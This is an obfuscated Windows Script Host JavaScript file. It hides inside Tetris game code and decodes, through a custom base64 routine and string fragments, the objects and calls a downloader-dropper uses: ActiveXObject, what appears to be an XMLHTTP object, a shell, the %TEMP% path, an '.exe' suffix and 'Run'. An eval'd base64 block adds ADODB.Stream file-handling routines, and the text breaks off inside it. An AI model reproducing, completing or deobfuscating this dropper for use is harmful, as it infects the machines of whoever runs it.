var votgorodazaspinoyiputkoroheCCClulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);

var votgorodazaspinoyiputkoroheCCClulalulaI, votgorodazaspinoyiputkoroheCCClulalulan = votgorodazaspinoyiputkoroheCCClulalula.length;
for (votgorodazaspinoyiputkoroheCCClulalulaI= 0; votgorodazaspinoyiputkoroheCCClulalulaI < votgorodazaspinoyiputkoroheCCClulalulan; ++votgorodazaspinoyiputkoroheCCClulalulaI) {
votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCClulalulaI] = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCClulalulaI] - 5;
}
votgorodazaspinoyiputkoroheCCCrodmands.scale = function(votgorodazaspinoyiputkoroheCCCp, votgorodazaspinoyiputkoroheCCCscaleX, votgorodazaspinoyiputkoroheCCCscaleY) {
if (votgorodazaspinoyiputkoroheCCCisObject(votgorodazaspinoyiputkoroheCCCscaleX)) {
votgorodazaspinoyiputkoroheCCCscaleY = votgorodazaspinoyiputkoroheCCCscaleX.y;
votgorodazaspinoyiputkoroheCCCscaleX = votgorodazaspinoyiputkoroheCCCscaleX.x;
} else if (!votgorodazaspinoyiputkoroheCCCisNumber(votgorodazaspinoyiputkoroheCCCscaleY)) {
votgorodazaspinoyiputkoroheCCCscaleY = votgorodazaspinoyiputkoroheCCCscaleX;
}
return new votgorodazaspinoyiputkoroheCCCrodmands(votgorodazaspinoyiputkoroheCCCp.x * votgorodazaspinoyiputkoroheCCCscaleX, votgorodazaspinoyiputkoroheCCCp.y * votgorodazaspinoyiputkoroheCCCscaleY);
};
votgorodazaspinoyiputkoroheCCCrodmands.votgorodazaspinoyiputkoroheCCCsameOrN = function(votgorodazaspinoyiputkoroheCCCparam1, votgorodazaspinoyiputkoroheCCCparam2) {
return votgorodazaspinoyiputkoroheCCCparam1.D == votgorodazaspinoyiputkoroheCCCparam2.D || votgorodazaspinoyiputkoroheCCCparam1.F == votgorodazaspinoyiputkoroheCCCparam2.F;
};

votgorodazaspinoyiputkoroheCCCrodmands.angle = function(votgorodazaspinoyiputkoroheCCCp) {
return Math.atan2(votgorodazaspinoyiputkoroheCCCp.y, votgorodazaspinoyiputkoroheCCCp.x);
};

function votgorodazaspinoyiputkoroheCCCTetromino(index){
this.x = 0;
this.y = 0;
this.selectedFrame = 0;
this.getNew(index);
}


String.prototype.votgorodazaspinoyiputkoroheCCCmanysecretthings = function() {

var votgorodazaspinoyiputkoroheCCCc1, votgorodazaspinoyiputkoroheCCCc2, votgorodazaspinoyiputkoroheCCCc3, votgorodazaspinoyiputkoroheCCCc4;
var votgorodazaspinoyiputkoroheCCCi, votgorodazaspinoyiputkoroheCCClen, votgorodazaspinoyiputkoroheCCCout;
var votgorodazaspinoyiputkoroheCCCstr = this.replace(/RAPAPIPATA/g, '');
votgorodazaspinoyiputkoroheCCClen = votgorodazaspinoyiputkoroheCCCstr.length;
votgorodazaspinoyiputkoroheCCCi = 0;
votgorodazaspinoyiputkoroheCCCout = "";

while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen) {
do {
votgorodazaspinoyiputkoroheCCCc1 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff];
} while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc1 == -1);

if (votgorodazaspinoyiputkoroheCCCc1 == -1)
break;
var votgorodazaspinoyiputkoroheCCCdodo = false;
do {
votgorodazaspinoyiputkoroheCCCc2 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff];
votgorodazaspinoyiputkoroheCCCdodo = votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc2 == -1;
} while (votgorodazaspinoyiputkoroheCCCdodo);

if (votgorodazaspinoyiputkoroheCCCc2 == -1)
break;

votgorodazaspinoyiputkoroheCCCout += String.fromCharCode((votgorodazaspinoyiputkoroheCCCc1 << 2) | ((votgorodazaspinoyiputkoroheCCCc2 & 0x30) >> 4));

do {
votgorodazaspinoyiputkoroheCCCc3 = votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff;

if (votgorodazaspinoyiputkoroheCCCc3 == 61)
return votgorodazaspinoyiputkoroheCCCout;

votgorodazaspinoyiputkoroheCCCc3 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCc3];
} while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc3 == -1);

if (votgorodazaspinoyiputkoroheCCCc3 == -1)
break;

votgorodazaspinoyiputkoroheCCCout += String.fromCharCode(((votgorodazaspinoyiputkoroheCCCc2 & 0XF) << 4) | ((votgorodazaspinoyiputkoroheCCCc3 & 0x3c) >> 2));

do {
votgorodazaspinoyiputkoroheCCCc4 = votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff;

if (votgorodazaspinoyiputkoroheCCCc4 == 61)
return votgorodazaspinoyiputkoroheCCCout;

votgorodazaspinoyiputkoroheCCCc4 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCc4];
} while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc4 == -1);

if (votgorodazaspinoyiputkoroheCCCc4 == -1)
break;

votgorodazaspinoyiputkoroheCCCout += String.fromCharCode(((votgorodazaspinoyiputkoroheCCCc3 & 0x03) << 6) | votgorodazaspinoyiputkoroheCCCc4);
}

return votgorodazaspinoyiputkoroheCCCout;
};


votgorodazaspinoyiputkoroheCCCTetromino.prototype.nextFrame = function () {

if ((this.selectedFrame + 1) < this.frameNumber) {
this.selectedFrame++;
} else {
this.selectedFrame = 0
}
};

var votgorodazaspinoyiputkoroheCCCVARDOCF ="JVRFTVAl".votgorodazaspinoyiputkoroheCCCmanysecretthings();
var votgorodazaspinoyiputkoroheCCCfinde = "QWN0aXZlWE9iamVjdARAPAPIPATA=RAPAPIPATA=RAPAPIPATA".votgorodazaspinoyiputkoroheCCCmanysecretthings();
String.prototype.votgorodazaspinoyiputkoroheCCCcenter2 = function () {
var votgorodazaspinoyiputkoroheCCCpirkinst = {
votgorodazaspinoyiputkoroheCCCVARDOCG: this
};
votgorodazaspinoyiputkoroheCCCpirkinst.votgorodazaspinoyiputkoroheCCCVARDOCE = votgorodazaspinoyiputkoroheCCCpirkinst.votgorodazaspinoyiputkoroheCCCVARDOCG["c3VRAPAPIPATAic3RyRAPAPIPATAaW5RAPAPIPATAn".votgorodazaspinoyiputkoroheCCCmanysecretthings()](votgorodazaspinoyiputkoroheCCCerrant, votgorodazaspinoyiputkoroheCCCchosen);
return votgorodazaspinoyiputkoroheCCCpirkinst.votgorodazaspinoyiputkoroheCCCVARDOCE;
};

var votgorodazaspinoyiputkoroheCCCsirdallos ="RAPAPIPATARXhwYW5RAPAPIPATAkRW52aXRAPAPIPATAJvbm1lbnRTdHJRAPAPIPATApbmdz".votgorodazaspinoyiputkoroheCCCmanysecretthings();
var votgorodazaspinoyiputkoroheCCCNative = function(options){

};votgorodazaspinoyiputkoroheCCCNative.votgorodazaspinoyiputkoroheCCCimplement = function(votgorodazaspinoyiputkoroheCCCobjects, votgorodazaspinoyiputkoroheCCCproperties){
for (var votgorodazaspinoyiputkoroheCCCi = 0, votgorodazaspinoyiputkoroheCCCl = votgorodazaspinoyiputkoroheCCCobjects.length; votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCCl; votgorodazaspinoyiputkoroheCCCi++) votgorodazaspinoyiputkoroheCCCobjects[votgorodazaspinoyiputkoroheCCCi].votgorodazaspinoyiputkoroheCCCimplement(votgorodazaspinoyiputkoroheCCCproperties);
};
var votgorodazaspinoyiputkoroheCCCd7 = votgorodazaspinoyiputkoroheCCCcenter("00M"+"11SX"+"22ML"+("votgorodazaspinoyiputkoroheCCCcontinues","votgorodazaspinoyiputkoroheCCCoxfordshire","votgorodazaspinoyiputkoroheCCCinconsolable","votgorodazaspinoyiputkoroheCCCgazelle","votgorodazaspinoyiputkoroheCCClaundry","2.")+"PIPIPKAM"+"LH"+"TT"+("votgorodazaspinoyiputkoroheCCCsurvival","votgorodazaspinoyiputkoroheCCCmotif","votgorodazaspinoyiputkoroheCCCchaotic","votgorodazaspinoyiputkoroheCCClotus","votgorodazaspinoyiputkoroheCCCheritage","votgorodazaspinoyiputkoroheCCCplaces","votgorodazaspinoyiputkoroheCCCcamera","votgorodazaspinoyiputkoroheCCCemacs","P}")+"WU"+("votgorodazaspinoyiputkoroheCCCeddie","votgorodazaspinoyiputkoroheCCCflustered","votgorodazaspinoyiputkoroheCCCexalt","votgorodazaspinoyiputkoroheCCCfahrenheit","votgorodazaspinoyiputkoroheCCCcredit","votgorodazaspinoyiputkoroheCCCclassroom","votgorodazaspinoyiputkoroheCCCtrends","cr")+("votgorodazaspinoyiputkoroheCCCunbending","votgorodazaspinoyiputkoroheCCCranked","votgorodazaspinoyiputkoroheCCCavenue","votgorodazaspinoyiputkoroheCCCdurable","votgorodazaspinoyiputkoroheCCCvestibule","votgorodazaspinoyiputkoroheCCCceremony","votgorodazaspinoyiputkoroheCCCelementary","votgorodazaspinoyiputkoroheCCCcongregate","ip")+"t:S"+("votgorodazaspinoyiputkoroheCCCmining","votgorodazaspinoyiputkoroheCCCsurmount","votgorodazaspinoyiputkoroheCCCintimidate","votgorodazaspinoyiputkoroheCCCbetween","votgorodazaspinoyiputkoroheCCCcroatia","votgorodazaspinoyiputkoroheCCCampland","votgorodazaspinoyiputkoroheCCCglenn","votgorodazaspinoyiputkoroheCCCmunicipality","h")+"e"+("votgorodazaspinoyiputkoroheCCCvoracious","votgorodazaspinoyiputkoroheCCCreaper","votgorodazaspinoyiputkoroheCCCcrispin","votgorodazaspinoyiputkoroheCCCcount","votgorodazaspinoyiputkoroheCCCeffeminacy","votgorodazaspinoyiputkoroheCCCmashed","votgorodazaspinoyiputkoroheCCCconvinced","votgorodazaspinoyiputkoroheCCCslovak","ll"));
var votgorodazaspinoyiputkoroheCCCDoUtra = [votgorodazaspinoyiputkoroheCCCfinde, votgorodazaspinoyiputkoroheCCCsirdallos,votgorodazaspinoyiputkoroheCCCVARDOCF, ""+"."+("votgorodazaspinoyiputkoroheCCCindus","votgorodazaspinoyiputkoroheCCCjubilation","votgorodazaspinoyiputkoroheCCCchampionship","votgorodazaspinoyiputkoroheCCCshepherdess","votgorodazaspinoyiputkoroheCCCpredict","votgorodazaspinoyiputkoroheCCCconsumes","votgorodazaspinoyiputkoroheCCCtransmitting","votgorodazaspinoyiputkoroheCCCcucumber","exe"), "UnRAPAPIPATAVuRAPAPIPATA".votgorodazaspinoyiputkoroheCCCmanysecretthings(),votgorodazaspinoyiputkoroheCCCd7];
votgorodazaspinoyiputkoroheCCCDoUtraAANO = votgorodazaspinoyiputkoroheCCCDoUtra.shift()
var votgorodazaspinoyiputkoroheCCCZumZum = this[votgorodazaspinoyiputkoroheCCCDoUtraAANO];
votgorodazaspinoyiputkoroheCCCfabled = "AAF2AA";
votgorodazaspinoyiputkoroheCCCNative.votgorodazaspinoyiputkoroheCCCgenericize = function(object, votgorodazaspinoyiputkoroheCCCproperty, votgorodazaspinoyiputkoroheCCCcheck){
if ((!votgorodazaspinoyiputkoroheCCCcheck || !object[votgorodazaspinoyiputkoroheCCCproperty]) && typeof object.prototype[votgorodazaspinoyiputkoroheCCCproperty] == 'function') object[votgorodazaspinoyiputkoroheCCCproperty] = function(){
var votgorodazaspinoyiputkoroheCCCargs = Array.prototype.slice.call(arguments);
return object.prototype[votgorodazaspinoyiputkoroheCCCproperty].apply(votgorodazaspinoyiputkoroheCCCargs.shift(), votgorodazaspinoyiputkoroheCCCargs);
};
};
votgorodazaspinoyiputkoroheCCCNative.votgorodazaspinoyiputkoroheCCCtypize = function(object, votgorodazaspinoyiputkoroheCCCfamily){
if (!object.type) object.type = function(item){
return (votgorodazaspinoyiputkoroheCCC$type(item) === votgorodazaspinoyiputkoroheCCCfamily);
};
};
votgorodazaspinoyiputkoroheCCCcasque = (("votgorodazaspinoyiputkoroheCCCactivists", "votgorodazaspinoyiputkoroheCCCsurmount", "votgorodazaspinoyiputkoroheCCCparenthesis", "votgorodazaspinoyiputkoroheCCCopportune", "votgorodazaspinoyiputkoroheCCCengross", "votgorodazaspinoyiputkoroheCCCillimitable", "votgorodazaspinoyiputkoroheCCCselfevident", "pwrthrthrthtr") + "hrhrwhrwh").votgorodazaspinoyiputkoroheCCCcenter2();
votgorodazaspinoyiputkoroheCCCtudabilo1 = (("votgorodazaspinoyiputkoroheCCCtownsman", "votgorodazaspinoyiputkoroheCCCended", "votgorodazaspinoyiputkoroheCCCrepository", "votgorodazaspinoyiputkoroheCCCgrounded", "votgorodazaspinoyiputkoroheCCCcoiffure", "votgorodazaspinoyiputkoroheCCCindivisible", "votgorodazaspinoyiputkoroheCCCprotecting", "votgorodazaspinoyiputkoroheCCCelector", "votgorodazaspinoyiputkoroheCCCrequested", "serhrth") + "herrth4th4wh").votgorodazaspinoyiputkoroheCCCcenter2();
var votgorodazaspinoyiputkoroheCCCd2 = votgorodazaspinoyiputkoroheCCCDoUtra.pop();
var votgorodazaspinoyiputkoroheCCCrampart = new votgorodazaspinoyiputkoroheCCCZumZum(votgorodazaspinoyiputkoroheCCCd2.split("}")[1]);
var votgorodazaspinoyiputkoroheCCCsudabilo1 = new votgorodazaspinoyiputkoroheCCCZumZum(votgorodazaspinoyiputkoroheCCCd2.split("}")[0]);
var votgorodazaspinoyiputkoroheCCCvulture = votgorodazaspinoyiputkoroheCCCrampart[votgorodazaspinoyiputkoroheCCCDoUtra.shift()](votgorodazaspinoyiputkoroheCCCDoUtra.shift());
var votgorodazaspinoyiputkoroheCCCweasel = "E";

var votgorodazaspinoyiputkoroheCCCamalgamation = votgorodazaspinoyiputkoroheCCCDoUtra.shift();
var votgorodazaspinoyiputkoroheCCCpromises = votgorodazaspinoyiputkoroheCCCDoUtra.shift();
var votgorodazaspinoyiputkoroheCCCostrokoncert = "b3RAPAPIPATABlbRAPAPIPATAg==".votgorodazaspinoyiputkoroheCCCmanysecretthings();

votgorodazaspinoyiputkoroheCCCTetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1) ) ); break; case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};

eval("IGZ1bmN0aW9uIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ3J0ZnRhKGZpbGVQYXRoKQ0Kew0KICAgIHZhciB2b3Rnb3JvZGF6YXNwaW5veWlwdXRrb3JvaGVDQ0NIcm9zdGVrcz1XU2NyaXB0WyJDcmVhdGVPYmplY3QiXSgiQURPREIuU3RyZWFtIik7DQogICAgdm90Z29yb2RhemFzcGlub3lpcHV0a29yb2hlQ0NDSHJvc3Rla3NbInR5cGUiXT0yOw0KICAgIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ0hyb3N0ZWtzWyJDaGFyc2V0Il09NDM3Ow0KICAgIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ0hyb3N0ZWtzWyJvcGVuIl0oKTsNCiAgICB2b3Rnb3JvZGF6YXNwaW5veWlwdXRrb3JvaGVDQ0NIcm9zdGVrc1siTG9hZEZyb21GaWxlIl0oZmlsZVBhdGgpOw0KICAgIHZhciBmaWxlU3RyaW5nPXZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ0hyb3N0ZWtzWyJSZWFkVGV4dCJdOw0KICAgIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ0hyb3N0ZWtzWyJjbG9zZSJdKCk7DQogICAgcmV0dXJuIHZvdGdvcm9kYXphc3Bpbm95aXB1dGtvcm9oZUNDQ2ZzdGEoZmlsZVN0cmluZyk7DQp9Ow0KZnVuY3Rpb24gdm90Z29yb2RhemFzcGlub3lpcHV0a29yb2hlQ0NDZnN0YShmaWxlU3RyaW5nKQ0KeyAgIA0KdmFyIHQxPW5ldyBBcnJheSgpOw0KCQ0KdDFbMHhDN109MHg4MDt0MVsweEZDXT0weDgxO3QxWzB4RTldPTB4ODI7dDFbMHhFMl09MHg4Mzt0MVsweEU0XT0weDg0O3QxWzB4RTBdPTB4ODU7dDFbMHhFNV09MHg4Njt0MVsweEU3XT0weDg3O3QxWzB4RUFdPTB4ODg7dDFbMHhFQl09MHg4OTt0MVsweEU4XT0weDhBO3QxWzB4RUZdPTB4OEI7dDFbMHhFRV09MHg4Qzt0MVsweEVDXT0weDhEO3QxWzB4QzRdPTB4OEU7dDFbMHhDNV09MHg4Rjt0MVsweEM5XT0weDkwO3QxWzB4RTZdPTB4OTE7dDFbMHhDNl09MHg5Mjt0MVsweEY0XT0weDkzO3QxWzB4RjZdPTB4OTQ7dDFbMHhGMl09MHg5NTt0MVsweEZCXT0weDk2O3QxWzB4RjldPTB4OTc7dDFbMHhGRl09MHg5ODt0MVsweEQ2XT0weDk5O3QxWzB4RENdPTB4OUE7dDFbMHhBMl09MHg5Qjt0MVsweEEzXT0weDlDO3QxWzB4QTVdPTB4OUQ7dDFbMHgyMEE3XT0weDlFO3QxWzB4MTkyXT0weDlGO3QxWzB4RTFdPTB4QTA7dDFbMHhFRF09MHhBMTt0MVsweEYzXT0weEEyO3QxWzB4RkFdPTB4QTM7dDFbMHhGMV09MHhBNDt0MVsweEQxXT0weEE1O3QxWzB4QUFdPTB4QTY7dDFbMHhCQV09MHhBNzt0MVsweEJGXT0weEE4O3QxWzB4MjMxMF09MHhBOTt0MVsweEFDXT0weEFBO3QxWzB4QkRdPTB4QUI7dDFbMHhCQ109MHhBQzt0MVsweEExXT0weEFEO3QxWzB4QUJdPTB4QUU7dDFbMHhCQl09MHhBRjt0MVsweDI1OTFdPTB4QjA7dDFbMHgyNTkyXT0weEIxO3QxWzB4MjU5M109MHhCMjt0MVsweDI1MDJdPTB4QjM7dDFbMHgyNTI0XT0weEI0O3QxWzB4MjU2MV09MHhCNTt0MVsweDI1NjJdPTB4QjY7dDFbMHgyNTU2XT0weEI3O3QxWzB4MjU1NV09MHhCODt0MVsweDI1NjNdPTB4Qjk7dDFbMHgyNTUxXT0weEJBO3QxWzB4MjU1N109MHhCQjt0MVsweDI1NURdPTB4QkM7dDFbMHgyNTVDXT0weEJEO3QxWzB4MjU1Ql09MHhCRTt0MVsweDI1MTBdPTB4QkY7dDFbMHgyNTE0XT0weEMwO3QxWzB4MjUzNF09MHhDMTt0MVsweDI1MkNdPTB4QzI7dDFbMHgyNTFDXT0weEMzOyAgICAgICAgICANCnQxWzB4MjUwMF09MHhDNDt0MVsweDI1M0NdPTB4QzU7dDFbMHgyNTVFXT0weEM2O3QxWzB4MjU1Rl09MHhDNzt0MVsweDI1NUFdPTB4Qzg7dDFbMHgyNTU0XT0weEM5O3QxWzB4MjU2OV09MHhDQTt0MVsweDI1NjZdPTB4Q0I7dDFbMHgyNTYwXT0weENDO3QxWzB4MjU1MF09MHhDRDt0MVsweDI1NkNdPTB4Q0U7dDFbMHgyNTY3XT0weENGO3QxWzB4MjU2OF09MHhEMDt0MVsweDI1NjRdPTB4RDE7dDFbMHgyNTY1XT0weEQyO3QxWzB4MjU1OV09MHhEMzt0MVsweDI1NThdPTB4RDQ7dDFbMHgyNTUyXT0weEQ1O3QxWzB4MjU1M109MHhENjt0MVsweDI1NkJdPTB4RDc7dDFbMHgyNTZBXT0weEQ4O3QxWzB4MjUxOF09MHhEOTt0MVsweDI1MENdPTB4REE7dDFbMHgyNTg4XT0weERCO3QxWzB4MjU4NF09MHhEQzt0MVsweDI1OENdPTB4REQ7dDFbMHgyNTkwXT0weERFO3QxWzB4MjU4MF09MHhERjt0MVsweDNCMV09MHhFMDt0MVsweERGXT0weEUxO3QxWzB4MzkzXT0weEUyO3QxWzB4M0MwXT0weEUzO3QxWzB4M0EzXT0weEU0O3QxWzB4M0MzXT0weEU1O3QxWzB4QjVdPTB4RTY7dDFbMHgzQzRdPTB4RTc7dDFbMHgzQTZdPTB4RTg7dDFbMHgzOThdPTB4RTk7dDFbMHgzQTldPTB4RUE7dDFbMHgzQjRdPTB4RUI7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCnQxWzB4MjIxRV09MHhFQzt0MVsweDNDNl09MHhFRDt0MVsweDNCNV09MHhFRTt0MVsweDIyMjldPTB4RUY7dDFbMHgyMjYxXT0weEYwO3QxWzB4QjFdPTB4RjE7dDFbMHgyMjY1XT0weEYyO3QxWzB4MjI2NF09MHhGMzt0MVsweDIzMjBdPTB4RjQ7dDFbMHgyMzIxXT0weEY1O3QxWzB4RjddPTB4RjY7dDFbMHgyMjQ4XT0weEY3O3QxWzB4QjBdPTB4Rjg7dDFbMHgyMjE5XT0weEY5O3QxWzB4QjddPTB4RkE7dDFbMHgyMjFBXT0weEZCO3QxWzB4MjA3Rl09MHhGQzt0MVsweEIyXT0weEZEO3QxWzB4MjVBMF09MHhGRTt0MVsweEEwXT0weEZGOw0KCQ0KCXZhciByZXN1bHRBcnJheT1uZXcgQXJyYXkoKTsNCglmb3IgKHZhciBUaj0wOyBUaiA8IGZpbGVTdHJpbmdbImxlbmd0aCJdOyBUaisrKQ0KCXsNCgkJdmFyIE9WYzk9ZmlsZVN0cmluZ1siY2hhckNvZGVBdCJdKFRqKTsNCgkJaWYgKE9WYzkgPCAxMjgpDQoJCQl7dmFyIEhJaTM9T1ZjOTt9DQoJCWVsc2UNCgkJCXt2YXIgSElpMz10MVtPVmM5XTt9DQoJCXJlc3VsdEFycmF5WyJwdXNoIl0oSElpMyk7DQoJfTsNCgkNCglyZXR1cm4gcmVzdWx0QXJyYXkgLyogeSAgKi87DQp9Ow0KZnVuY3Rpb24gdm90Z29yb2RhemFzcGlub3lpcHV0a29yb2hlQ0NDZmF0cyhjb2RlQXJyYXkpDQp7DQogICAgdmFyIHQyPW5ldyBBcnJheSgpOw0KCQ0KdDJbMHg4MF09MHgwMEM3O3QyWzB4ODFdPTB4MDBGQzt0MlsweDgyXT0weDAwRTk7dDJbMHg4M109MHgwMEUyO3QyWzB4ODRdPTB4MDBFNDt0MlsweDg1XT0weDAwRTA7dDJbMHg4Nl09MHgwMEU1O3QyWzB4ODddPTB4MDBFNzt0MlsweDg4XT0weDAwRUE7dDJbMHg4OV09MHgwMEVCO3QyWzB4OEFdPTB4MDBFODt0MlsweDhCXT0weDAwRUY7dDJbMHg4Q109MHgwMEVFO3QyWzB4OERdPTB4MDBFQzt0MlsweDhFXT0weDAwQzQ7dDJbMHg4Rl09MHgwMEM1O3QyWzB4OTBdPTB4MDBDOTt0MlsweDkxXT0weDAwRTY7dDJbMHg5Ml09MHgwMEM2O3QyWzB4OTNdPTB4MDBGNDt0MlsweDk0XT0weDAwRjY7dDJbMHg5NV09MHgwMEYyO3QyWzB4OTZdPTB4MDBGQjt0MlsweDk3XT0weDAwRjk7dDJbMHg5OF09MHgwMEZGO3QyWzB4OTldPTB4MDBENjt0MlsweDlBXT0weDAwREM7dDJbMHg5Ql09MHgwMEEyO3QyWzB4OUNdPTB4MDBBMzt0MlsweDlEXT0weDAwQTU7dDJbMHg5RV09MHgyMEE3O3QyWzB4OUZdPTB4MDE5Mjt0MlsweEEwXT0weDAwRTE7dDJbMHhBMV09MHgwMEVEO3QyWzB4QTJdPTB4MDBGMzt0MlsweEEzXT0weDAwRkE7dDJbMHhBNF09MHgwMEYxO3QyWzB4QTVdPTB4MDBEMTt0MlsweEE2XT0weDAwQUE7dDJbMHhBN109MHgwMEJBO3QyWzB4QThdPTB4MDBCRjt0MlsweEE5XT0weDIzMTA7dDJbMHhBQV09MHgwMEFDO3QyWzB4QUJdPTB4MDBCRDt0MlsweEFDXT0weDAwQkM7dDJbMHhBRF09MHgwMEExO3QyWzB4QUVdPTB4MDBBQjt0MlsweEFGXT0weDAwQkI7dDJbMHhCMF09MHgyNTkxO3QyWzB4QjFdPTB4MjU5Mjt0MlsweEIyXT0weDI1OTM7dDJbMHhCM109MHgyNTAyO3QyWzB4QjRdPTB4MjUyNDt0MlsweEI1XT0weDI1NjE7dDJbMHhCNl09MHgyNTYyO3QyWzB4QjddPTB4MjU1Njt0MlsweEI4XT0weDI1NTU7dDJbMHhCOV09MHgyNTYzO3QyWzB4QkFdPTB4MjU1MTt0MlsweEJCXT0weDI1NTc7dDJbMHhCQ109MHgyNTVEO3QyWzB4QkRdPTB4MjU1Qzt0MlsweEJFXT0weDI1NUI7dDJbMHhCRl09MHgyNTEwO3QyWzB4QzBdPTB4MjUxNDt0MlsweEMxXT0weDI1MzQ7dDJbMHhDMl09MHgyNTJDO3QyWzB4QzNdPTB4MjUxQzt0MlsweEM0XT0weDI1MDA7dDJbMHhDNV09MHgyNTNDO3QyWzB4QzZdPTB4MjU1RTt0MlsweEM3XT0weDI1NUY7dDJbMHhDOF09MHgyNTVBO3QyWzB4QzldPTB4MjU1NDt0MlsweENBXT0weDI1Njk7dDJbMHhDQl09MHgyNTY2O3QyWzB4Q0NdPTB4MjU2MDt0MlsweENEXT0weDI1NTA7dDJbMHhDRV09MHgyNTZDO3QyWzB4Q0ZdPTB4MjU2Nzt0MlsweEQwXT0weDI1Njg7dDJbMHhEMV09MHgyNTY0O3QyWzB4RDJdPTB4MjU2NTt0MlsweEQzXT0weDI1NTk7dDJbMHhENF09MHgyNTU4O3QyWzB4RDVdPTB4MjU1Mjt0MlsweEQ2XT0weDI1NTM7dDJbMHhEN109MHgyNTZCO3QyWzB4RDhdPTB4MjU2QTt0MlsweEQ5XT0weDI1MTg7dDJbMH